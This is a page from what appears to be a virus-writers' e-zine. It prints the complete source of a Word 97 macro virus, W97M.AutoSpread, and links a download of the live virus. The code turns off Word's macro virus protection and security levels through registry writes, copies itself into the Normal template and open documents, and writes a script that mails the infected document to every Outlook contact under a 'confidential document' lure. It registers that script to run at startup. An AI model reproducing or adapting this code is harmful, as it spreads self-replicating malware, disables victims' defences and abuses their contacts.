<html>
<head>
<title>rRlf #2</title>
</head>
<body text="#ffffff" link="#58b3f6" vlink="#58b3f6" alink="#58b3f6" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Infiltration of a Nation</i>
<br><table cellpadding="9">
<tr>
<th><a href="21.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="23.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>W97M.AutoSpread by PetiK</u></b>
<p>Attribute VB_Name = "AutoSpread"
<p>Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long)
<p>Sub AutoOpen()
<br>nam = ActiveDocument.Name
<br>vnam = Left(nam, Len(nam) - 4)
<p>Call FuckProtection
<br>Call InfectWord
<br>Call Spread
<p>If Day(Now) = 8 Then
<br>MsgBox "This Document is infected by W97M." + vnam, vbCritical, "W97M." + vnam + ".A"
<br>End If
<p>End Sub
<p>Sub InfectWord()
<br>On Error Resume Next
<br>Set nor = NormalTemplate.VBProject.VBComponents
<br>Set doc = ActiveDocument.VBProject.VBComponents
<br>srcmod = "C:\kitep.drv"
<br>If nor.Item("AutoSpread").Name <> "AutoSpread" Then
<br>&nbsp;&nbsp;&nbsp;&nbsp;doc("AutoSpread").Export srcmod
<br>&nbsp;&nbsp;&nbsp;&nbsp;nor.Import srcmod
<br>&nbsp;&nbsp;&nbsp;&nbsp;End If
<br>If doc.Item("AutoSpread").Name <> "AutoSpread" Then
<br>&nbsp;&nbsp;&nbsp;&nbsp;nor("AutoSpread").Export srcmod
<br>&nbsp;&nbsp;&nbsp;&nbsp;doc.Import srcmod
<br>&nbsp;&nbsp;&nbsp;&nbsp;ActiveDocument.Save
<br>&nbsp;&nbsp;&nbsp;&nbsp;End If
<br>Kill (srcmod)
<br>End Sub
<p>Sub FuckProtection()
<br>With Options
<br>&nbsp;&nbsp;&nbsp;&nbsp;.ConfirmConversions = False
<br>&nbsp;&nbsp;&nbsp;&nbsp;.VirusProtection = False
<br>&nbsp;&nbsp;&nbsp;&nbsp;.SaveNormalPrompt = False
<br>End With
<br>Select Case Application.Version
<br>Case "10.0"
<br>&nbsp;&nbsp;&nbsp;&nbsp;System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
<br>&nbsp;&nbsp;&nbsp;&nbsp;System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
<br>Case "9.0"
<br>&nbsp;&nbsp;&nbsp;&nbsp;System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
<br>End Select
<br>WordBasic.DisableAutoMacros 0
<br>End Sub
<p>Sub Spread()
<br>On Error Resume Next
<br>subj = Left(ActiveDocument.Name, Len(ActiveDocument.Name) - 4)
<br>att = ActiveDocument.FullName
<br>win = Environ("windir")
<br>FileSystem.MkDir win + "\AutoSpread"
<br>x = 0
<br>nfile = ""
<br>Do While x < 8
<br>Randomize (Timer)
<br>nfile = nfile + Chr(Int(Rnd(1) * 8) + 48)
<br>x = x + 1
<br>Loop
<br>reg = nfile
<br>nfile = nfile + ".vbs"
<br>nfile = win + "\AutoSpread\" + nfile
<br>Open nfile For Output As #1
<br>Print #1, "'From W97M.AutoSpread"
<br>Print #1, "On Error Resume Next"
<br>Print #1, "Set out=CreateObject(""Outlook.Application"")"
<br>Print #1, "Set map=out.GetNameSpace(""MAPI"")"
<br>Print #1, "For Each C in map.AddressLists"
<br>Print #1, "If C.AddressEntries.Count <> 0 Then"
<br>Print #1, "For D=1 To C.AddressEntries.Count"
<br>Print #1, "Set E=C.AddressEntries(D)"
<br>Print #1, "Set env=out.CreateItem(0)"
<br>Print #1, "env.To=E.Address"
<br>Print #1, "env.Subject=""" + subj + """"
<br>Print #1, "env.Body=""This confidential document is for you."""
<br>Print #1, "env.Attachments.Add(""" + att + """)"
<br>Print #1, "env.DeleteAfterSubmit=True"
<br>Print #1, "If env.To <> """" Then"
<br>Print #1, "env.Send"
<br>Print #1, "End If"
<br>Print #1, "Next"
<br>Print #1, "End If"
<br>Print #1, "Next"
<br>Print #1, "WScript.Quit"
<br>System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", reg) = nfile
<br>End Sub
<p>Sub HelpAbout()
<p>With Application.Assistant
<br>&nbsp;&nbsp;&nbsp;&nbsp;.Visible = True
<br>End With
<br>With Assistant.NewBalloon
<br>&nbsp;&nbsp;&nbsp;&nbsp;.Text = "W97M.AutoSpread.A coded by PetiK (c)2002"
<br>&nbsp;&nbsp;&nbsp;&nbsp;.Heading = "W97M.AutoSpread"
<br>&nbsp;&nbsp;&nbsp;&nbsp;.Animation = msoAnimationGetAttentionMajor
<br>&nbsp;&nbsp;&nbsp;&nbsp;.Button = msoButtonSetOK
<br>&nbsp;&nbsp;&nbsp;&nbsp;.Show
<br>End With
<p>slp = Sleep(5000)
<p>For nb = 1 To Int(Rnd(1) * 10) + 1
<br>Selection.TypeText "Hi guy, You're infected by my virus. It's not dangerous. "
<br>Selection.TypeText "Refer to AntiVirus site to disinfect your computer. "
<br>Selection.TypeText "No dangerous payload, large spread, it's coded by PetiK. "
<br>Next nb
<p>End Sub
<p><a href="22.zip">living virus</a>
</body>
</html>
